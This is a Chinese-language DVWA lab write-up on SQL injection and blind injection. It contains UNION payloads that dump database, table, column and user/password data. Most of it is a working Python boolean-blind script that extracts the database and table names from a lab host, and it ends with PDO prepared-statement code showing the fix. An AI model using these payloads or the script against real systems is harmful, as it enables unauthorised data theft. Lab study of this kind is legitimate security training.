dvwa中sql注入与盲注
注入:
low:
payload:
查看字段数目
1' order by 2 #
1' order by 3 #
爆库
1' union select 1,database() #
爆表
1' union select 1,GROUP_CONCAT(TABLE_NAME) FROM information_schema.`TABLES` where TABLE_SCHEMA='dvwa' #
爆字段
1' union select 1,GROUP_CONCAT(COLUMN_NAME) FROM information_schema.`COLUMNS` where TABLE_SCHEMA='dvwa' and TABLE_NAME='users'#
爆数据
1' union select user,password from users #
medium:
用bp抓包后很明显是数字型注入:将 payload 中的 ' 去掉即可
high:
很明显它只会显示一组数据了,使用数据库中不存在的id再注入即可
impossible:(php中PDO技术,类似于java中的jdbc,先预编译,再传参)
// Parameterized query: the SQL text (with the :id placeholder) is compiled
// before any user value is bound, so the value can only ever be data and
// cannot alter the query structure. This is why the "impossible" level does
// not respond to the quote/UNION payloads shown for the lower levels.
$data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
// Prepare (pre-compile) the statement.
$data->bindParam( ':id', $id, PDO::PARAM_INT );
// Bind the parameter and constrain its type to integer.
$data->execute();
// Execute the prepared statement.
盲注:
low:
- 抄了大佬一个python脚本
import requests,re
#构建head头部
def get_header():
    """Return the ``(headers, url)`` pair used by every probe in this script.

    Everything is hard-coded for a single DVWA lab instance: the ``PHPSESSID``
    cookie is a captured session and ``security=low`` selects the DVWA
    difficulty level, so these values are only meaningful for that session.
    The prompt string is printed exactly as the original author wrote it.

    Returns:
        tuple[dict[str, str], str]: request headers and the target page URL.
    """
    print('imput url')
    target_host = 'f2dc4578-0d82-4f44-9728-7dab9ed3a25a.node4.buuoj.cn:81'
    url = 'http://' + target_host + '/vulnerabilities/sqli_blind/'
    # Browser-like headers copied from an intercepted request; Referer is the
    # same page that is being probed.
    header_items = [
        ('Host', target_host),
        ('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0'),
        ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'),
        ('Accept-Language', 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'),
        ('Connection', 'close'),
        ('Referer', url),
        ('Cookie', 'UM_distinctid=17d95c1130a584-0dc5f2065052a48-4c3e217e-144000-17d95c1130b7dc;security=low; PHPSESSID=8mepl10iji29942ldjko3ljep7'),
        ('Upgrade-Insecure-Requests', '1'),
    ]
    headers = dict(header_items)
    return headers, url
#爆库的长度
def db_length(url, headers):
    """Find the length of the current database name (1..5) by boolean probing.

    The page's fixed message ``'User ID exists in the database.'`` is the
    one-bit oracle: a probe is counted as "true" when that text appears in
    the response body. Each candidate length is one separate GET, so from the
    server side this stage looks like a short burst of near-identical
    requests to the same path with the ``id`` value varying only in one
    number.

    Args:
        url: page URL returned by ``get_header``.
        headers: request headers returned by ``get_header``.

    Returns:
        int: the first length in 1..5 whose probe is "true", or 0 if none is.
    """
    hit = 'User ID exists in the database.'
    dbLen = 0
    for candidate in range(1, 6):
        # '#' is sent URL-encoded (%23) because the payload is placed in the
        # query string directly.
        probe = f"?id=1' and length(database()) = {candidate} %23&Submit=Submit"
        body = requests.get(url + probe, headers=headers).text
        if hit in body:
            dbLen = candidate
            break
    print('dbLen=', dbLen)
    return dbLen
#爆库名
def db_name(dbLen, url, headers):
    """Recover the database name one character at a time.

    For each position 1..``dbLen`` the candidate characters are the ASCII
    codes 65..122 (``'A'``..``'z'`` and the punctuation between them), tried
    in order; the first code whose probe returns the oracle text is taken and
    its code is printed. A position where no candidate matches is simply
    skipped, so the result can be shorter than ``dbLen``.

    Args:
        dbLen: name length obtained from ``db_length``.
        url: page URL returned by ``get_header``.
        headers: request headers returned by ``get_header``.

    Returns:
        str: the recovered characters joined in order (also printed).
    """
    hit = 'User ID exists in the database.'
    found = []
    for pos in range(1, dbLen + 1):
        for code in range(65, 123):
            guess = chr(code)
            # The compared character must itself be single-quoted in the SQL.
            probe = f"?id=1' and substr(database(),{pos},1)='{guess}' %23&Submit=Submit"
            body = requests.get(url + probe, headers=headers).text
            if hit in body:
                print(code)
                found.append(guess)
                break
    dbName = ''.join(found)
    print(dbName)
    return dbName
#爆表总长度
#select 1 and (select length(GROUP_CONCAT(TABLE_NAME,'^')) = 29 FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) #
#注意:子查询一定要加(),因为没加()浪费了我一个小时
#注意:还有就是尽量能用数据库就用数据库,TABLE_SCHEMA=DATABASE(),如果用你查出来的库是不行的,我也不清楚为什么爆库的时候不分大小写,而爆表的时候就分大小写了。。我自己的数据库反正是不分大小写的
def tb_len(dbName, url, headers):
    """Find the length of the ``'^'``-joined list of table names (10..29).

    The probe compares ``length(GROUP_CONCAT(TABLE_NAME,'^'))`` for the
    current schema (``TABLE_SCHEMA=DATABASE()``) against each candidate;
    the subquery is parenthesised, which the original author notes is
    required. ``dbName`` is accepted for call-site symmetry but is not used
    by the probe, which relies on ``DATABASE()`` instead.

    Args:
        dbName: database name from ``db_name`` (unused here).
        url: page URL returned by ``get_header``.
        headers: request headers returned by ``get_header``.

    Returns:
        int: the first matching length in 10..29, or -1 if none matches.
    """
    hit = 'User ID exists in the database.'
    tbLen = -1
    for candidate in range(10, 30):
        probe = (
            "?id=1' and (select length(GROUP_CONCAT(TABLE_NAME,'^')) = "
            f"{candidate} FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) %23&Submit=Submit"
        )
        body = requests.get(url + probe, headers=headers).text
        if hit in body:
            tbLen = candidate
            break
    print(tbLen)
    return tbLen
#爆表名
#select 1 and (select substr(GROUP_CONCAT(TABLE_NAME,'^'),i,1)='b' FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) #
def tb_name(tbLen, url, headers):
    """Recover the ``'^'``-joined table-name list one character at a time.

    Same search as ``db_name`` (ASCII codes 65..122 per position, first hit
    wins, unmatched positions skipped) but applied to
    ``substr(GROUP_CONCAT(TABLE_NAME,'^'),pos,1)`` for the current schema.

    Args:
        tbLen: joined-list length obtained from ``tb_len``.
        url: page URL returned by ``get_header``.
        headers: request headers returned by ``get_header``.

    Returns:
        str: the recovered characters joined in order (also printed).
    """
    hit = 'User ID exists in the database.'
    found = []
    for pos in range(1, tbLen + 1):
        for code in range(65, 123):
            guess = chr(code)
            probe = (
                f"?id=1' and (select substr(GROUP_CONCAT(TABLE_NAME,'^'),{pos},1)='{guess}' "
                "FROM information_schema.`TABLES` where TABLE_SCHEMA=DATABASE()) %23&Submit=Submit"
            )
            body = requests.get(url + probe, headers=headers).text
            if hit in body:
                found.append(guess)
                break
    tbName = ''.join(found)
    print(tbName)
    return tbName
if __name__ == '__main__':
    # Run the four stages in order; each stage's result feeds the next and
    # every stage prints its own result as it finishes.
    headers, url = get_header()
    target = (url, headers)
    dbLen = db_length(*target)
    dbName = db_name(dbLen, *target)
    tbLen = tb_len(dbName, *target)
    tbName = tb_name(tbLen, *target)
- 两位大佬blog:
https://blog.csdn.net/qq_42785117/article/details/100310559
https://blog.csdn.net/qq_42181428/article/details/88075784
medium
medium没有写python脚本,主要是它不仅用了post,传输的数据格式还不是json,但是用bp抓包后可以直接暴力破解
high
high模式下,发现还是post,但它中途进行了跳转,bp第二个包的cookie是第一个包传的参数的url编码,所以直接使用bp的暴力破解模式即可
暴力破解
暴力破解书写payload时一位一位爆破,不然会无限重复
impossible
和sql注入的impossible一样,都采用了PDO预编译,参数只能作为数据而不能改变SQL语句结构,因此能防止注入